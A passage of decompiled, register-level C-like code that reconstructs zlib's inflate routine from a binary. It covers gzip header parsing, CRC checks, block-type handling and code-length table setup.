                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__edx =  *(__ecx + 0x1c);
                                                                                                                                                                                        											__eflags =  *(__ecx + 0x1c);
                                                                                                                                                                                        											if( *(__ecx + 0x1c) != 0) {
                                                                                                                                                                                        												__edx =  *(__ebx + 0x40);
                                                                                                                                                                                        												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x20));
                                                                                                                                                                                        												if(__edx <  *((intOrPtr*)(__ecx + 0x20))) {
                                                                                                                                                                                        													__ecx =  *(__ecx + 0x1c);
                                                                                                                                                                                        													__eax = _v48;
                                                                                                                                                                                        													 *(__ecx + __edx) = __al;
                                                                                                                                                                                        													_t207 = __ebx + 0x40;
                                                                                                                                                                                        													 *_t207 =  *(__ebx + 0x40) + 1;
                                                                                                                                                                                        													__eflags =  *_t207;
                                                                                                                                                                                        													__eax = _v56;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t210 =  &_v12; // 0x38
                                                                                                                                                                                        											__edx =  *_t210;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = _v48;
                                                                                                                                                                                        										if(_v48 == 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __eax - __esi;
                                                                                                                                                                                        										if(__eax < __esi) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        									_t215 =  &_a4; // 0x38
                                                                                                                                                                                        									__esi =  *_t215;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        										 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        										__eax = _v56;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx = _v8;
                                                                                                                                                                                        									_v12 = _v12 + __eax;
                                                                                                                                                                                        									__ecx = _v8 - __eax;
                                                                                                                                                                                        									__eflags = _v48;
                                                                                                                                                                                        									_v8 = __ecx;
                                                                                                                                                                                        									if(_v48 != 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										goto L110;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 7:
                                                                                                                                                                                        									__edx = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L112:
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00001000;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00001000) == 0) {
                                                                                                                                                                                        										__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __eax;
                                                                                                                                                                                        										if(__eax != 0) {
                                                                                                                                                                                        											 *(__eax + 0x24) = __edx;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										L128:
                                                                                                                                                                                        										__edx = _v16;
                                                                                                                                                                                        										 *__ebx = 8;
                                                                                                                                                                                        										goto L129;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = __ecx;
                                                                                                                                                                                        									if(__ecx == 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__esi = _v8;
                                                                                                                                                                                        									__eax = __edx;
                                                                                                                                                                                        									_t231 =  &_v12; // 0x38
                                                                                                                                                                                        									__edx =  *_t231;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__ecx =  *(__eax + __edx) & 0x000000ff;
                                                                                                                                                                                        										__eax = __eax + 1;
                                                                                                                                                                                        										_v48 = __ecx;
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        										_v56 = __eax;
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											__edx =  *(__ecx + 0x24);
                                                                                                                                                                                        											__eflags =  *(__ecx + 0x24);
                                                                                                                                                                                        											if( *(__ecx + 0x24) != 0) {
                                                                                                                                                                                        												__edx =  *(__ebx + 0x40);
                                                                                                                                                                                        												__eflags = __edx -  *((intOrPtr*)(__ecx + 0x28));
                                                                                                                                                                                        												if(__edx <  *((intOrPtr*)(__ecx + 0x28))) {
                                                                                                                                                                                        													__ecx =  *(__ecx + 0x24);
                                                                                                                                                                                        													__eax = _v48;
                                                                                                                                                                                        													 *(__ecx + __edx) = __al;
                                                                                                                                                                                        													_t242 = __ebx + 0x40;
                                                                                                                                                                                        													 *_t242 =  *(__ebx + 0x40) + 1;
                                                                                                                                                                                        													__eflags =  *_t242;
                                                                                                                                                                                        													__eax = _v56;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											_t245 =  &_v12; // 0x38
                                                                                                                                                                                        											__edx =  *_t245;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = _v48;
                                                                                                                                                                                        										if(_v48 == 0) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __eax - __esi;
                                                                                                                                                                                        										if(__eax < __esi) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        									_t250 =  &_a4; // 0x38
                                                                                                                                                                                        									__esi =  *_t250;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000200) != 0) {
                                                                                                                                                                                        										 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        										__eax = _v56;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx = _v8;
                                                                                                                                                                                        									_v12 = _v12 + __eax;
                                                                                                                                                                                        									__ecx = _v8 - __eax;
                                                                                                                                                                                        									__eflags = _v48;
                                                                                                                                                                                        									_v8 = __ecx;
                                                                                                                                                                                        									if(_v48 != 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										goto L128;
                                                                                                                                                                                        									}
                                                                                                                                                                                        								case 8:
                                                                                                                                                                                        									L129:
                                                                                                                                                                                        									__eflags =  *(__ebx + 0x10) & 0x00000200;
                                                                                                                                                                                        									if(( *(__ebx + 0x10) & 0x00000200) == 0) {
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                        										L138:
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x20);
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx != 0) {
                                                                                                                                                                                        											 *(__ebx + 0x10) =  *(__ebx + 0x10) >> 9;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x10) >> 0x00000009 & 0x00000001;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											 *(__ecx + 0x2c) = __eax;
                                                                                                                                                                                        											__eax =  *(__ebx + 0x20);
                                                                                                                                                                                        											 *( *(__ebx + 0x20) + 0x30) = 1;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = E013230C1(__edx, __edx, __edx);
                                                                                                                                                                                        										 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        										 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        										 *__ebx = 0xb;
                                                                                                                                                                                        										goto L141;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                        									_pop(__eax);
                                                                                                                                                                                        									__eflags = __edi - __eax;
                                                                                                                                                                                        									if(__edi >= __eax) {
                                                                                                                                                                                        										L134:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                                                                                                        										__eflags = __edx - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                                                                                                        										if(__edx == ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											_v16 = 0;
                                                                                                                                                                                        											_v20 = 0;
                                                                                                                                                                                        											goto L138;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *(__esi + 0x18) = "header crc mismatch";
                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t265 =  &_v12; // 0x38
                                                                                                                                                                                        									__eax =  *_t265;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_t268 =  &_v12; // 0x38
                                                                                                                                                                                        										__eax =  *_t268;
                                                                                                                                                                                        										__eax =  *_t268 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										__eflags = __edi - 0x10;
                                                                                                                                                                                        										if(__edi < 0x10) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L134;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 9:
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L151:
                                                                                                                                                                                        										__ecx = __edx;
                                                                                                                                                                                        										__edi = 0xff00;
                                                                                                                                                                                        										__ecx = __edx & 0x0000ff00;
                                                                                                                                                                                        										__edx = __edx << 0x10;
                                                                                                                                                                                        										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10);
                                                                                                                                                                                        										__edx = __edx >> 8;
                                                                                                                                                                                        										__eax = __edx >> 0x00000008 & 0x0000ff00;
                                                                                                                                                                                        										__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
                                                                                                                                                                                        										__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
                                                                                                                                                                                        										__edx = __edx >> 0x18;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__eax = __eax + __edx;
                                                                                                                                                                                        										 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        										 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        										__eax = 0;
                                                                                                                                                                                        										__edx = 0;
                                                                                                                                                                                        										 *__ebx = 0xa;
                                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                                        										__edi = 0;
                                                                                                                                                                                        										goto L153;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = _v12;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										__eax = _v12 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L151;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 0xa:
                                                                                                                                                                                        									__eax = 0;
                                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                                        									L153:
                                                                                                                                                                                        									__eflags =  *((intOrPtr*)(__ebx + 0xc)) - __eax;
                                                                                                                                                                                        									if( *((intOrPtr*)(__ebx + 0xc)) == __eax) {
                                                                                                                                                                                        										__eax = _v32;
                                                                                                                                                                                        										 *(__esi + 0xc) = _v32;
                                                                                                                                                                                        										__eax = _v28;
                                                                                                                                                                                        										 *(__esi + 0x10) = _v28;
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										 *__esi = _v12;
                                                                                                                                                                                        										 *(__esi + 4) = __ecx;
                                                                                                                                                                                        										 *(__ebx + 0x38) = __edx;
                                                                                                                                                                                        										 *(__ebx + 0x3c) = __edi;
                                                                                                                                                                                        										_push(2);
                                                                                                                                                                                        										goto L145;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = E01322E91(__eax, __eax, __eax);
                                                                                                                                                                                        									__edx = _v16;
                                                                                                                                                                                        									__ecx = _v8;
                                                                                                                                                                                        									 *(__ebx + 0x18) = __eax;
                                                                                                                                                                                        									 *(__esi + 0x30) = __eax;
                                                                                                                                                                                        									 *__ebx = 0xb;
                                                                                                                                                                                        									goto L155;
                                                                                                                                                                                        								case 0xb:
                                                                                                                                                                                        									L155:
                                                                                                                                                                                        									__eflags = _a8 - 5;
                                                                                                                                                                                        									if(_a8 == 5) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = _a8 - 6;
                                                                                                                                                                                        									if(_a8 == 6) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L157;
                                                                                                                                                                                        								case 0xc:
                                                                                                                                                                                        									L157:
                                                                                                                                                                                        									__eflags =  *(__ebx + 4);
                                                                                                                                                                                        									if( *(__ebx + 4) == 0) {
                                                                                                                                                                                        										__eflags = __edi - 3;
                                                                                                                                                                                        										if(__edi >= 3) {
                                                                                                                                                                                        											L163:
                                                                                                                                                                                        											__eax = __edx;
                                                                                                                                                                                        											__edx = __edx >> 1;
                                                                                                                                                                                        											 *(__ebx + 4) = __eax;
                                                                                                                                                                                        											__edx = __edx & 0x00000003;
                                                                                                                                                                                        											__eax = __edx & 0x00000003;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												 *__ebx = 0xd;
                                                                                                                                                                                        												L172:
                                                                                                                                                                                        												__edx = __edx >> 2;
                                                                                                                                                                                        												__edi = __edi - 3;
                                                                                                                                                                                        												L29:
                                                                                                                                                                                        												_v16 = _t834;
                                                                                                                                                                                        												_v20 = _t844;
                                                                                                                                                                                        												goto L142;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = __eax - 1;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												__eax = E01321718(__ebx);
                                                                                                                                                                                        												 *__ebx = 0x13;
                                                                                                                                                                                        												__eflags = _a8 - 6;
                                                                                                                                                                                        												if(_a8 != 6) {
                                                                                                                                                                                        													goto L172;
                                                                                                                                                                                        												}
                                                                                                                                                                                        												__edx = __edx >> 2;
                                                                                                                                                                                        												__edi = __edi - 3;
                                                                                                                                                                                        												_v16 = __edx;
                                                                                                                                                                                        												goto L331;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax = __eax - 1;
                                                                                                                                                                                        											__eflags = __eax;
                                                                                                                                                                                        											if(__eax == 0) {
                                                                                                                                                                                        												_push(0x10);
                                                                                                                                                                                        												_pop(__eax);
                                                                                                                                                                                        												 *__ebx = __eax;
                                                                                                                                                                                        											} else {
                                                                                                                                                                                        												__eax = __eax - 1;
                                                                                                                                                                                        												__eflags = __eax;
                                                                                                                                                                                        												if(__eax == 0) {
                                                                                                                                                                                        													 *(__esi + 0x18) = "invalid block type";
                                                                                                                                                                                        													 *__ebx = 0x1d;
                                                                                                                                                                                        												}
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L172;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L331;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											_v8 = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											__edx = __edx + __eax;
                                                                                                                                                                                        											__eax = _v12;
                                                                                                                                                                                        											__eax = _v12 + 1;
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											_v12 = __eax;
                                                                                                                                                                                        											__eflags = __edi - 3;
                                                                                                                                                                                        											if(__edi < 3) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L163;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__ecx = __edi;
                                                                                                                                                                                        									 *__ebx = 0x1a;
                                                                                                                                                                                        									__ecx = __edi & 0x00000007;
                                                                                                                                                                                        									__edx = __edx >> __cl;
                                                                                                                                                                                        									__edi = __edi - __ecx;
                                                                                                                                                                                        									_v16 = __edx;
                                                                                                                                                                                        									_v20 = __edi;
                                                                                                                                                                                        									goto L142;
                                                                                                                                                                                        								case 0xd:
                                                                                                                                                                                        									__edi = __edi & 0x00000007;
                                                                                                                                                                                        									__edi = __edi - (__edi & 0x00000007);
                                                                                                                                                                                        									__edx = __edx >> __cl;
                                                                                                                                                                                        									_v16 = __edx;
                                                                                                                                                                                        									_v20 = __edi;
                                                                                                                                                                                        									__eflags = __edi - 0x20;
                                                                                                                                                                                        									if(__edi >= 0x20) {
                                                                                                                                                                                        										L177:
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										__ecx = __edx;
                                                                                                                                                                                        										__eax =  !__edx;
                                                                                                                                                                                        										__ecx = __edx & 0x0000ffff;
                                                                                                                                                                                        										__eax =  !__edx >> 0x10;
                                                                                                                                                                                        										__eflags = __ecx -  !__edx >> 0x10;
                                                                                                                                                                                        										if(__ecx ==  !__edx >> 0x10) {
                                                                                                                                                                                        											__eax = 0;
                                                                                                                                                                                        											 *(__ebx + 0x40) = __ecx;
                                                                                                                                                                                        											__eflags = _a8 - 6;
                                                                                                                                                                                        											__edx = 0;
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											__edi = 0;
                                                                                                                                                                                        											_v16 = 0;
                                                                                                                                                                                        											_v20 = 0;
                                                                                                                                                                                        											 *__ebx = 0xe;
                                                                                                                                                                                        											if(_a8 == 6) {
                                                                                                                                                                                        												goto L332;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L180;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *(__esi + 0x18) = "invalid stored block lengths";
                                                                                                                                                                                        										goto L25;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = _v12;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L332;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										__eax = _v12 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0x20;
                                                                                                                                                                                        										if(__edi < 0x20) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L177;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L332;
                                                                                                                                                                                        								case 0xe:
                                                                                                                                                                                        									L180:
                                                                                                                                                                                        									 *__ebx = 0xf;
                                                                                                                                                                                        									goto L181;
                                                                                                                                                                                        								case 0xf:
                                                                                                                                                                                        									L181:
                                                                                                                                                                                        									__eax =  *(__ebx + 0x40);
                                                                                                                                                                                        									__eflags = __eax;
                                                                                                                                                                                        									if(__eax == 0) {
                                                                                                                                                                                        										 *__ebx = 0xb;
                                                                                                                                                                                        										goto L143;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eflags = __eax - __ecx;
                                                                                                                                                                                        									__eax = (__eax > __ecx) ? __ecx : __eax;
                                                                                                                                                                                        									__eflags = __eax - _v28;
                                                                                                                                                                                        									__eax = (__eax > _v28) ? _v28 : __eax;
                                                                                                                                                                                        									_v56 = __eax;
                                                                                                                                                                                        									__eflags = __eax;
                                                                                                                                                                                        									if(__eax == 0) {
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = memcpy(_v32, _v12, __eax);
                                                                                                                                                                                        									__eax = _v56;
                                                                                                                                                                                        									__esp = __esp + 0xc;
                                                                                                                                                                                        									__ecx = _v8;
                                                                                                                                                                                        									_v12 = _v12 + __eax;
                                                                                                                                                                                        									__ecx = _v8 - __eax;
                                                                                                                                                                                        									_v28 = _v28 - __eax;
                                                                                                                                                                                        									_v32 = _v32 + __eax;
                                                                                                                                                                                        									 *(__ebx + 0x40) =  *(__ebx + 0x40) - __eax;
                                                                                                                                                                                        									__edx = _v16;
                                                                                                                                                                                        									_v8 = __ecx;
                                                                                                                                                                                        									goto L143;
                                                                                                                                                                                        								case 0x10:
                                                                                                                                                                                        									__eflags = __edi - 0xe;
                                                                                                                                                                                        									if(__edi >= 0xe) {
                                                                                                                                                                                        										L189:
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										__edi = __edi - 0xe;
                                                                                                                                                                                        										__eax = __edx & 0x0000001f;
                                                                                                                                                                                        										__edx = __edx >> 5;
                                                                                                                                                                                        										__eax = __eax + 0x101;
                                                                                                                                                                                        										_v20 = __edi;
                                                                                                                                                                                        										 *(__ebx + 0x60) = __eax;
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										__eax = __edx & 0x0000001f;
                                                                                                                                                                                        										__edx = __edx >> 5;
                                                                                                                                                                                        										 *(__ebx + 0x64) = __eax;
                                                                                                                                                                                        										__eax = __edx;
                                                                                                                                                                                        										__eax = __edx & 0x0000000f;
                                                                                                                                                                                        										__edx = __edx >> 4;
                                                                                                                                                                                        										__eax = __eax + 4;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x60) - 0x11e;
                                                                                                                                                                                        										 *(__ebx + 0x5c) = __eax;
                                                                                                                                                                                        										if( *(__ebx + 0x60) > 0x11e) {
                                                                                                                                                                                        											L192:
                                                                                                                                                                                        											 *(__esi + 0x18) = "too many length or distance symbols";
                                                                                                                                                                                        											goto L39;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x64) - 0x1e;
                                                                                                                                                                                        										if( *(__ebx + 0x64) > 0x1e) {
                                                                                                                                                                                        											goto L192;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                                                        										_push(0x11);
                                                                                                                                                                                        										_pop(__eax);
                                                                                                                                                                                        										 *__ebx = __eax;
                                                                                                                                                                                        										goto L198;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = _v12;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags = __ecx;
                                                                                                                                                                                        										if(__ecx == 0) {
                                                                                                                                                                                        											goto L331;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        										_v8 = __ecx;
                                                                                                                                                                                        										__ecx = __edi;
                                                                                                                                                                                        										__eax = __eax << __cl;
                                                                                                                                                                                        										__edi = __edi + 8;
                                                                                                                                                                                        										__ecx = _v8;
                                                                                                                                                                                        										__edx = __edx + __eax;
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										__eax = _v12 + 1;
                                                                                                                                                                                        										_v16 = __edx;
                                                                                                                                                                                        										_v12 = __eax;
                                                                                                                                                                                        										__eflags = __edi - 0xe;
                                                                                                                                                                                        										if(__edi < 0xe) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L189;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									goto L331;
                                                                                                                                                                                        								case 0x11:
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L198:
                                                                                                                                                                                        										__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x68) -  *(__ebx + 0x5c);
                                                                                                                                                                                        										if( *(__ebx + 0x68) >=  *(__ebx + 0x5c)) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eflags = __edi - 3;
                                                                                                                                                                                        										if(__edi >= 3) {
                                                                                                                                                                                        											L197:
                                                                                                                                                                                        											__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        											__edx = __edx & 0x00000007;
                                                                                                                                                                                        											__edx = __edx >> 3;
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                                                        											 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                                                        											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        											__edi = __edi - 3;
                                                                                                                                                                                        											__eflags = __edi;
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											_v20 = __edi;
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax = _v12;
                                                                                                                                                                                        										while(1) {
                                                                                                                                                                                        											__eflags = __ecx;
                                                                                                                                                                                        											if(__ecx == 0) {
                                                                                                                                                                                        												goto L331;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											__eax =  *__eax & 0x000000ff;
                                                                                                                                                                                        											_v8 = __ecx;
                                                                                                                                                                                        											__ecx = __edi;
                                                                                                                                                                                        											__eax = __eax << __cl;
                                                                                                                                                                                        											__edi = __edi + 8;
                                                                                                                                                                                        											__ecx = _v8;
                                                                                                                                                                                        											__edx = __edx + __eax;
                                                                                                                                                                                        											__eax = _v12;
                                                                                                                                                                                        											__eax = _v12 + 1;
                                                                                                                                                                                        											_v16 = __edx;
                                                                                                                                                                                        											_v12 = __eax;
                                                                                                                                                                                        											__eflags = __edi - 3;
                                                                                                                                                                                        											if(__edi < 3) {
                                                                                                                                                                                        												continue;
                                                                                                                                                                                        											}
                                                                                                                                                                                        											goto L197;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L331;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										__eflags =  *(__ebx + 0x68) - 0x13;
                                                                                                                                                                                        										if( *(__ebx + 0x68) >= 0x13) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										__eax =  *(__ebx + 0x68);
                                                                                                                                                                                        										__ecx = 0;
                                                                                                                                                                                        										__eax =  *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff;
                                                                                                                                                                                        										 *((short*)(__ebx + 0x70 + ( *(0x1324908 +  *(__ebx + 0x68) * 2) & 0x0000ffff) * 2)) = __cx;
                                                                                                                                                                                        										_t389 = __ebx + 0x68;
                                                                                                                                                                                        										 *_t389 =  *(__ebx + 0x68) + 1;
                                                                                                                                                                                        										__eflags =  *_t389;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									__eax = __ebx + 0x530;
                                                                                                                                                                                        									__ecx = __ebx + 0x6c;
                                                                                                                                                                                        									 *(__ebx + 0x4c) = __eax;
                                                                                                                                                                                        									 *(__ebx + 0x6c) = __eax;
                                                                                                                                                                                        									__edx = __ebx + 0x54;
                                                                                                                                                                                        									__eax = __ebx + 0x2f0;
                                                                                                                                                                                        									 *(__ebx + 0x54) = 7;
                                                                                                                                                                                        									__eax = __ebx + 0x70;
                                                                                                                                                                                        									__eax = E013233B4(0, __ebx + 0x70, 0x13, __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                                                        									_v36 = __eax;
                                                                                                                                                                                        									__eflags = __eax;
                                                                                                                                                                                        									if(__eax == 0) {
                                                                                                                                                                                        										 *(__ebx + 0x68) =  *(__ebx + 0x68) & 0x00000000;
                                                                                                                                                                                        										 *__ebx = 0x12;
                                                                                                                                                                                        										goto L233;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									 *(__esi + 0x18) = "invalid code lengths set";
                                                                                                                                                                                        									goto L204;
                                                                                                                                                                                        								case 0x12:
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										L233:
                                                                                                                                                                                        										 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                                                        										__ecx =  *(__ebx + 0x68);
                                                                                                                                                                                        										_v48 = __ecx;
